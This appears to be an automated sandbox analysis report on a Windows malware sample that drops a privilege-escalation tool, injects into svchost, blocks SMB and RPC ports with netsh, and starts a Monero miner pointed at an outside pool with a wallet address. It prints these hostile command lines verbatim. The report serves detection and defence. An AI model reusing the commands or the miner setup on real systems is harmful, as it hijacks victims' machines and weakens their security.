0bd2014bb1daba436cf1168ca4de9d3784afef3a4141c2305f786da543567c15

Analysis

max time kernel
58s
max time network
149s
platform
windows7_x64
resource
win7v20210410
submitted
07-05-2021 13:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tq.exe
Size

418KB
MD5

e8450e61f061fd90d74507eb04845ecd
SHA1

f344f20c57f9cb01ea3166f3404336da1519a832
SHA256

0bd2014bb1daba436cf1168ca4de9d3784afef3a4141c2305f786da543567c15
SHA512

d4497d9c37812c9d0733ab1785e4592cabb1fd5861d8b102c8eb351f0c96b8f70be8f27ac2e817976b751cfb8fd25167376df412bde8f966ea3a195086dd1a91

Score

8^/10

persistence upx

Malware Config

Signatures

Downloads MZ/PE file
Executes dropped EXE 8 IoCs

Processes:

MS19.exeMS20.exeMSSQLH.exeRunDllExe.exeRunDllExe.exex64.exewudfhosts.exe

pid process

1608 MS19.exe
1916 MS20.exe
296 MSSQLH.exe
1016
808 RunDllExe.exe
944 RunDllExe.exe
1600 x64.exe
1928 wudfhosts.exe
Registers new Print Monitor 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

pid	process
1608	MS19.exe
1916	MS20.exe
296	MSSQLH.exe
1016
808	RunDllExe.exe
944	RunDllExe.exe
1600	x64.exe
1928	wudfhosts.exe

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\x64.exe	upx
\Users\Admin\AppData\Local\Temp\x64.exe	upx
C:\Users\Admin\AppData\Local\Temp\x64.exe	upx
C:\Users\Admin\AppData\Local\Temp\x64.exe	upx
C:\Windows\Cursors\wudfhosts.exe	upx
C:\Windows\Cursors\WUDFhosts.exe	upx
\Windows\Cursors\WUDFhosts.exe	upx

Loads dropped DLL 10 IoCs

Processes:

tq.exeMSSQLH.exesvchost.exesvchost.exe

pid process

2000 tq.exe
1168
2000 tq.exe
1960
2000 tq.exe
2000 tq.exe
296 MSSQLH.exe
296 MSSQLH.exe
1932 svchost.exe
1900 svchost.exe

pid	process
2000	tq.exe
1168
2000	tq.exe
1960
2000	tq.exe
2000	tq.exe
296	MSSQLH.exe
296	MSSQLH.exe
1932	svchost.exe
1900	svchost.exe

Drops file in System32 directory 2 IoCs

Processes:

svchost.exe

description	ioc	process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Update[1].txt	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	svchost.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

RunDllExe.exeRunDllExe.exesvchost.exe

description	pid	process	target process
PID 944 set thread context of 560	944	RunDllExe.exe	svchost.exe
PID 808 set thread context of 472	808	RunDllExe.exe	svchost.exe
PID 1932 set thread context of 1900	1932	svchost.exe	svchost.exe

Drops file in Windows directory 18 IoCs

Processes:

x64.exeMSSQLH.exeRunDllExe.exeRunDllExe.exesvchost.exe

description	ioc	process
File created	C:\Windows\Cursors\WUDFhosts.exe	x64.exe
File created	C:\Windows\MpMgSvc.dll	MSSQLH.exe
File created	C:\Windows\Logs\RunDllExe_New.dll	RunDllExe.exe
File opened for modification	C:\Windows\Logs\RunDllExe.dll	RunDllExe.exe
File created	C:\Windows\Logs\RunDllExe_New	RunDllExe.exe
File opened for modification	C:\Windows\Logs\RunDllExe	RunDllExe.exe
File opened for modification	C:\Windows\Help\active_desktop_render.dll	svchost.exe
File created	C:\Windows\Logs\Vers.txt	MSSQLH.exe
File created	C:\Windows\Logs\RunDllExe_New.dll	RunDllExe.exe
File opened for modification	C:\Windows\Logs\RunDllExe.dll	RunDllExe.exe
File opened for modification	C:\Windows\Logs\RunDllExe	RunDllExe.exe
File created	C:\Windows\Logs\RunDllExe_New	RunDllExe.exe
File created	C:\Windows\Help\active_desktop_render.dll	x64.exe
File created	C:\Windows\Help\active_desktop_render_New.dll	svchost.exe
File created	C:\Windows\Logs\RunDllExe.exe	MSSQLH.exe
File created	C:\Windows\Logs\RunDllExe	MSSQLH.exe
File created	C:\Windows\Logs\RunDllExe.dll	MSSQLH.exe
File opened for modification	C:\Windows\Cursors\WUDFhosts.exe	x64.exe

Modifies data under HKEY_USERS 24 IoCs

Processes:

svchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecisionReason = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecisionReason = "1"	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecisionTime = e08d1b844043d701	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecision = "0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a070023000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadNetworkName = "Network"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecision = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecisionTime = e08d1b844043d701	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\32-e2-17-db-d2-77	svchost.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

MSSQLH.exesvchost.exe

pid process

296 MSSQLH.exe
1900 svchost.exe
1900 svchost.exe
1900 svchost.exe
1900 svchost.exe
1900 svchost.exe

pid	process
296	MSSQLH.exe
1900	svchost.exe
1900	svchost.exe
1900	svchost.exe
1900	svchost.exe
1900	svchost.exe

Suspicious use of AdjustPrivilegeToken 34 IoCs

Processes:

MS20.exeMSSQLH.exesvchost.exewudfhosts.exe

description	pid	process
Token: SeImpersonatePrivilege	1916	MS20.exe
Token: SeRestorePrivilege	296	MSSQLH.exe
Token: SeBackupPrivilege	296	MSSQLH.exe
Token: SeSecurityPrivilege	296	MSSQLH.exe
Token: SeTakeOwnershipPrivilege	296	MSSQLH.exe
Token: SeRestorePrivilege	296	MSSQLH.exe
Token: SeBackupPrivilege	296	MSSQLH.exe
Token: SeSecurityPrivilege	296	MSSQLH.exe
Token: SeTakeOwnershipPrivilege	296	MSSQLH.exe
Token: SeRestorePrivilege	296	MSSQLH.exe
Token: SeBackupPrivilege	296	MSSQLH.exe
Token: SeSecurityPrivilege	296	MSSQLH.exe
Token: SeTakeOwnershipPrivilege	296	MSSQLH.exe
Token: SeRestorePrivilege	296	MSSQLH.exe
Token: SeBackupPrivilege	296	MSSQLH.exe
Token: SeSecurityPrivilege	296	MSSQLH.exe
Token: SeTakeOwnershipPrivilege	296	MSSQLH.exe
Token: SeRestorePrivilege	296	MSSQLH.exe
Token: SeBackupPrivilege	296	MSSQLH.exe
Token: SeSecurityPrivilege	296	MSSQLH.exe
Token: SeTakeOwnershipPrivilege	296	MSSQLH.exe
Token: SeRestorePrivilege	296	MSSQLH.exe
Token: SeBackupPrivilege	296	MSSQLH.exe
Token: SeSecurityPrivilege	296	MSSQLH.exe
Token: SeTakeOwnershipPrivilege	296	MSSQLH.exe
Token: SeRestorePrivilege	296	MSSQLH.exe
Token: SeBackupPrivilege	296	MSSQLH.exe
Token: SeSecurityPrivilege	296	MSSQLH.exe
Token: SeTakeOwnershipPrivilege	296	MSSQLH.exe
Token: SeRestorePrivilege	1900	svchost.exe
Token: SeBackupPrivilege	1900	svchost.exe
Token: SeSecurityPrivilege	1900	svchost.exe
Token: SeTakeOwnershipPrivilege	1900	svchost.exe
Token: SeLockMemoryPrivilege	1928	wudfhosts.exe

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

tq.exeMSSQLH.exeRunDllExe.exeRunDllExe.exex64.exesvchost.exesvchost.exe

pid process

2000 tq.exe
296 MSSQLH.exe
808 RunDllExe.exe
944 RunDllExe.exe
1600 x64.exe
1932 svchost.exe
1900 svchost.exe
1900 svchost.exe

pid	process
2000	tq.exe
296	MSSQLH.exe
808	RunDllExe.exe
944	RunDllExe.exe
1600	x64.exe
1932	svchost.exe
1900	svchost.exe
1900	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

tq.exeRunDllExe.exeRunDllExe.exeMSSQLH.exex64.exe

description	pid	process	target process
PID 2000 wrote to memory of 1608	2000	tq.exe	MS19.exe
PID 2000 wrote to memory of 1608	2000	tq.exe	MS19.exe
PID 2000 wrote to memory of 1608	2000	tq.exe	MS19.exe
PID 2000 wrote to memory of 1608	2000	tq.exe	MS19.exe
PID 2000 wrote to memory of 1916	2000	tq.exe	MS20.exe
PID 2000 wrote to memory of 1916	2000	tq.exe	MS20.exe
PID 2000 wrote to memory of 1916	2000	tq.exe	MS20.exe
PID 2000 wrote to memory of 1916	2000	tq.exe	MS20.exe
PID 2000 wrote to memory of 296	2000	tq.exe	MSSQLH.exe
PID 2000 wrote to memory of 296	2000	tq.exe	MSSQLH.exe
PID 2000 wrote to memory of 296	2000	tq.exe	MSSQLH.exe
PID 2000 wrote to memory of 296	2000	tq.exe	MSSQLH.exe
PID 808 wrote to memory of 472	808	RunDllExe.exe	svchost.exe
PID 808 wrote to memory of 472	808	RunDllExe.exe	svchost.exe
PID 808 wrote to memory of 472	808	RunDllExe.exe	svchost.exe
PID 808 wrote to memory of 472	808	RunDllExe.exe	svchost.exe
PID 808 wrote to memory of 472	808	RunDllExe.exe	svchost.exe
PID 808 wrote to memory of 472	808	RunDllExe.exe	svchost.exe
PID 944 wrote to memory of 560	944	RunDllExe.exe	svchost.exe
PID 944 wrote to memory of 560	944	RunDllExe.exe	svchost.exe
PID 944 wrote to memory of 560	944	RunDllExe.exe	svchost.exe
PID 944 wrote to memory of 560	944	RunDllExe.exe	svchost.exe
PID 944 wrote to memory of 560	944	RunDllExe.exe	svchost.exe
PID 944 wrote to memory of 560	944	RunDllExe.exe	svchost.exe
PID 296 wrote to memory of 436	296	MSSQLH.exe	cacls.exe
PID 296 wrote to memory of 436	296	MSSQLH.exe	cacls.exe
PID 296 wrote to memory of 436	296	MSSQLH.exe	cacls.exe
PID 296 wrote to memory of 436	296	MSSQLH.exe	cacls.exe
PID 944 wrote to memory of 560	944	RunDllExe.exe	svchost.exe
PID 808 wrote to memory of 472	808	RunDllExe.exe	svchost.exe
PID 808 wrote to memory of 472	808	RunDllExe.exe	svchost.exe
PID 808 wrote to memory of 472	808	RunDllExe.exe	svchost.exe
PID 944 wrote to memory of 560	944	RunDllExe.exe	svchost.exe
PID 944 wrote to memory of 560	944	RunDllExe.exe	svchost.exe
PID 944 wrote to memory of 560	944	RunDllExe.exe	svchost.exe
PID 808 wrote to memory of 472	808	RunDllExe.exe	svchost.exe
PID 296 wrote to memory of 1600	296	MSSQLH.exe	x64.exe
PID 296 wrote to memory of 1600	296	MSSQLH.exe	x64.exe
PID 296 wrote to memory of 1600	296	MSSQLH.exe	x64.exe
PID 296 wrote to memory of 1600	296	MSSQLH.exe	x64.exe
PID 1600 wrote to memory of 572	1600	x64.exe	netsh.exe
PID 1600 wrote to memory of 572	1600	x64.exe	netsh.exe
PID 1600 wrote to memory of 572	1600	x64.exe	netsh.exe
PID 1600 wrote to memory of 572	1600	x64.exe	netsh.exe
PID 1600 wrote to memory of 1064	1600	x64.exe	netsh.exe
PID 1600 wrote to memory of 1064	1600	x64.exe	netsh.exe
PID 1600 wrote to memory of 1064	1600	x64.exe	netsh.exe
PID 1600 wrote to memory of 1064	1600	x64.exe	netsh.exe
PID 1600 wrote to memory of 808	1600	x64.exe	netsh.exe
PID 1600 wrote to memory of 808	1600	x64.exe	netsh.exe
PID 1600 wrote to memory of 808	1600	x64.exe	netsh.exe
PID 1600 wrote to memory of 808	1600	x64.exe	netsh.exe
PID 1600 wrote to memory of 1452	1600	x64.exe	netsh.exe
PID 1600 wrote to memory of 1452	1600	x64.exe	netsh.exe
PID 1600 wrote to memory of 1452	1600	x64.exe	netsh.exe
PID 1600 wrote to memory of 1452	1600	x64.exe	netsh.exe
PID 1600 wrote to memory of 1396	1600	x64.exe	netsh.exe
PID 1600 wrote to memory of 1396	1600	x64.exe	netsh.exe
PID 1600 wrote to memory of 1396	1600	x64.exe	netsh.exe
PID 1600 wrote to memory of 1396	1600	x64.exe	netsh.exe
PID 1600 wrote to memory of 1624	1600	x64.exe	netsh.exe
PID 1600 wrote to memory of 1624	1600	x64.exe	netsh.exe
PID 1600 wrote to memory of 1624	1600	x64.exe	netsh.exe
PID 1600 wrote to memory of 1624	1600	x64.exe	netsh.exe

C:\Users\Admin\AppData\Local\Temp\tq.exe
"C:\Users\Admin\AppData\Local\Temp\tq.exe"
1⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2000

C:\Users\Admin\AppData\Local\Temp\MS19.exe
C:\Users\Admin\AppData\Local\Temp\MS19.exe -l 6666 -p C:\ProgramData\MSSQLH.exe -t *
2⤵
- Executes dropped EXE
PID:1608

C:\Users\Admin\AppData\Local\Temp\MS20.exe
C:\Users\Admin\AppData\Local\Temp\MS20.exe -c C:\ProgramData\MSSQLH.exe
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1916

C:\Users\Admin\AppData\Local\Temp\MSSQLH.exe
C:\Users\Admin\AppData\Local\Temp\MSSQLH.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:296

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Fonts\*.exe /e /d system
3⤵
PID:436

C:\Users\Admin\AppData\Local\Temp\x64.exe
x64.exe
3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1600

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=Block
4⤵
PID:572

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=Filter1
4⤵
PID:1064

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
4⤵
PID:808

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
4⤵
PID:1452

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
4⤵
PID:1396

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
4⤵
PID:1624

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
4⤵
PID:1460

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
4⤵
PID:1904

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=FilteraAtion1 action=block
4⤵
PID:968

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
4⤵
PID:1952

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=Block assign=y
4⤵
PID:472

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\x64.exe"
4⤵
PID:2016

C:\Windows\Logs\RunDllExe.exe
C:\Windows\Logs\RunDllExe.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:808

C:\Windows\SysWOW64\svchost.exe
C:\Windows\system32\svchost.exe
2⤵
PID:472

C:\Windows\Logs\RunDllExe.exe
C:\Windows\Logs\RunDllExe.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:944

C:\Windows\SysWOW64\svchost.exe
C:\Windows\system32\svchost.exe
2⤵
PID:560

C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe -k GraphicsPerf_SvcsGroup
1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:1932

C:\Windows\SysWOW64\svchost.exe
C:\Windows\system32\svchost.exe
2⤵
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1900

C:\Windows\Cursors\wudfhosts.exe
C:\Windows\Cursors\wudfhosts.exe -o xmr.usa-138.com:80 -u 4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1928

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\MS19.exe
MD5
af43611695488fcabec428adc17c47ce

SHA1
62c98fbc6e57317662369ca7a6bf249ba61e3ba9

SHA256
33a7285470f1e33f1c1c0ed5644a2837694643e2c93c505912288e7c483fbf61

SHA512
a2b6eb1338d1c7541b114753dc42cb676fb4c765e2f8e118d7e612863c6ccb0b1588902043f15531b43501d2c8f4325a127f400b8c3176ae07ff463d6e8d2778

Download Submit
C:\Users\Admin\AppData\Local\Temp\MS20.exe
MD5
262fa5258c0bbd68221eed7226c58cd3

SHA1
0d8f0d3054f9b7c315bb9dc904258c755c39e379

SHA256
b7f22e9af63211806b1af562cd32868f8987451f40d392cc777aaba703a6b933

SHA512
a15a572fbe4d893211358b35ab1fa2b328985f717806cfaeae28946f1f3461c7d11e6cfdd135650189c45ccbd7252c7c9948043a3bde510dc0ee5b5a70690f55

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSSQLH.exe
MD5
4f824985f3aa38c89d6ce76e87f3f1c9

SHA1
8f5c01ef6f5f3aa1b470ad8bb75d0822802b85b5

SHA256
dc9c54d7d9be92653b727c6a2b1537c0233c99a132595ec4ce651578b1bff1c4

SHA512
1cf5860a03b76a5e1bcf49160a71fea967aff39215fc2625ebf323ad454afb967a0885670ffb0fe104f5eac93ba9ec61f482bff69436844a89d3f826ae6e4ed3

Download Submit
C:\Users\Admin\AppData\Local\Temp\x64.exe
MD5
1fc1c860e86a8fbc2021d2567d62f703

SHA1
42ea2c9f4548614574dff36e019ae1cbc68b54e3

SHA256
76005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306

SHA512
fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c

Download Submit
C:\Users\Admin\AppData\Local\Temp\x64.exe
MD5
1fc1c860e86a8fbc2021d2567d62f703

SHA1
42ea2c9f4548614574dff36e019ae1cbc68b54e3

SHA256
76005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306

SHA512
fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c

Download Submit
C:\Windows\Cursors\WUDFhosts.exe
MD5
4a72e30c0a582b082030adfd8345014f

SHA1
2f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353

SHA256
e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976

SHA512
8a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798

Download Submit
C:\Windows\Cursors\wudfhosts.exe
MD5
4a72e30c0a582b082030adfd8345014f

SHA1
2f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353

SHA256
e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976

SHA512
8a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798

Download Submit
C:\Windows\Logs\RunDllExe
MD5
72e85a6a9f4a9eaa4a5237095385676c

SHA1
61fc4204ce09d3c4827ba6647fe88cf0701164ff

SHA256
73f868b22ca348ce3806f51c48c1f216b03dbcc0266e79958f75d73648b1ae93

SHA512
bdf83c534c3f9b6167eb54de252bd8d58ed858448afa17f7fe25d6f8b7e0aa58a4baffed59f9211c9bde93c8aaa051eb79bad8311e972a473b5ce9906ba33319

Download Submit
C:\Windows\Logs\RunDllExe
MD5
72e85a6a9f4a9eaa4a5237095385676c

SHA1
61fc4204ce09d3c4827ba6647fe88cf0701164ff

SHA256
73f868b22ca348ce3806f51c48c1f216b03dbcc0266e79958f75d73648b1ae93

SHA512
bdf83c534c3f9b6167eb54de252bd8d58ed858448afa17f7fe25d6f8b7e0aa58a4baffed59f9211c9bde93c8aaa051eb79bad8311e972a473b5ce9906ba33319

Download Submit
C:\Windows\Logs\RunDllExe.dll
MD5
98a5b45bf5c2341c8e530785c27c0219

SHA1
0148cfd9cc24cc5bd3ec8d17387d982cb83eb992

SHA256
3335acf02f6cab32a7b4d18517b33412d49b6ad29f167a58561e6711645aade2

SHA512
9e0618a01864d032beb60f54f9ae9e2258051f743f28197c33732fc517871f6dcca532e172f7bee62c1db7de5ea6fa8984b933afd878b79eda95870d9daab3d7

Download Submit
C:\Windows\Logs\RunDllExe.dll
MD5
e91fbd6fe9e6794de7c1552adad7edbc

SHA1
b49b7136945978800948b3f9cbe208a5b80020a8

SHA256
2cf78dc7d2588d7874dee8a0919ca2d3aab8ac8e54664a0a2c188e099687a33a

SHA512
84a6d9df7e4accd3c14650174953fe3a5b5de810d444a31a442a9236486785d492ea5ec0151e63e359ee5c2718243003d7b92a8b9f2544b6bd7cd18ee2f6accc

Download Submit
C:\Windows\Logs\RunDllExe.exe
MD5
645564cf1c80e047a6e90ac0f2d6a6b7

SHA1
35e4b5e065b90fe5b1713e5a4645875f023b6a18

SHA256
6f3a1b04d5398967356e42fb0245e26fb2d15c5e03db2650e225c6fbe9f6cef9

SHA512
e4ce9ad7f83c84932b30641937c1b9fc9c2dbb647fa05743f8ec5f01b66a7813441b410166e181b432fc2ca47c7edbb94000bd4d389c53961c2a100f319a0c21

Download Submit
C:\Windows\Logs\RunDllExe.exe
MD5
645564cf1c80e047a6e90ac0f2d6a6b7

SHA1
35e4b5e065b90fe5b1713e5a4645875f023b6a18

SHA256
6f3a1b04d5398967356e42fb0245e26fb2d15c5e03db2650e225c6fbe9f6cef9

SHA512
e4ce9ad7f83c84932b30641937c1b9fc9c2dbb647fa05743f8ec5f01b66a7813441b410166e181b432fc2ca47c7edbb94000bd4d389c53961c2a100f319a0c21

Download Submit
\??\c:\windows\help\active_desktop_render.dll
MD5
14e2b194b652d4fd912404775a6ae898

SHA1
e93f529bb61e12c41426cb2b86176bf0af387c09

SHA256
24ca5f0220c6bbcb081de1cd4e4115bb026cd45dbe34fc462a40b241b026d66c

SHA512
b2ee0b06da1a42c04ef54e36f4a66720698e1c2d58545854d0989ae805d00e760b8bc8815ab00dd8be208f7816ed4249855c9fa506427c1f89a3dfb309c734d6

Download Submit
\Users\Admin\AppData\Local\Temp\MS19.exe
MD5
af43611695488fcabec428adc17c47ce

SHA1
62c98fbc6e57317662369ca7a6bf249ba61e3ba9

SHA256
33a7285470f1e33f1c1c0ed5644a2837694643e2c93c505912288e7c483fbf61

SHA512
a2b6eb1338d1c7541b114753dc42cb676fb4c765e2f8e118d7e612863c6ccb0b1588902043f15531b43501d2c8f4325a127f400b8c3176ae07ff463d6e8d2778

Download Submit
\Users\Admin\AppData\Local\Temp\MS19.exe
MD5
af43611695488fcabec428adc17c47ce

SHA1
62c98fbc6e57317662369ca7a6bf249ba61e3ba9

SHA256
33a7285470f1e33f1c1c0ed5644a2837694643e2c93c505912288e7c483fbf61

SHA512
a2b6eb1338d1c7541b114753dc42cb676fb4c765e2f8e118d7e612863c6ccb0b1588902043f15531b43501d2c8f4325a127f400b8c3176ae07ff463d6e8d2778

Download Submit
\Users\Admin\AppData\Local\Temp\MS20.exe
MD5
262fa5258c0bbd68221eed7226c58cd3

SHA1
0d8f0d3054f9b7c315bb9dc904258c755c39e379

SHA256
b7f22e9af63211806b1af562cd32868f8987451f40d392cc777aaba703a6b933

SHA512
a15a572fbe4d893211358b35ab1fa2b328985f717806cfaeae28946f1f3461c7d11e6cfdd135650189c45ccbd7252c7c9948043a3bde510dc0ee5b5a70690f55

Download Submit
\Users\Admin\AppData\Local\Temp\MS20.exe
MD5
262fa5258c0bbd68221eed7226c58cd3

SHA1
0d8f0d3054f9b7c315bb9dc904258c755c39e379

SHA256
b7f22e9af63211806b1af562cd32868f8987451f40d392cc777aaba703a6b933

SHA512
a15a572fbe4d893211358b35ab1fa2b328985f717806cfaeae28946f1f3461c7d11e6cfdd135650189c45ccbd7252c7c9948043a3bde510dc0ee5b5a70690f55

Download Submit
\Users\Admin\AppData\Local\Temp\MSSQLH.exe
MD5
4f824985f3aa38c89d6ce76e87f3f1c9

SHA1
8f5c01ef6f5f3aa1b470ad8bb75d0822802b85b5

SHA256
dc9c54d7d9be92653b727c6a2b1537c0233c99a132595ec4ce651578b1bff1c4

SHA512
1cf5860a03b76a5e1bcf49160a71fea967aff39215fc2625ebf323ad454afb967a0885670ffb0fe104f5eac93ba9ec61f482bff69436844a89d3f826ae6e4ed3

Download Submit
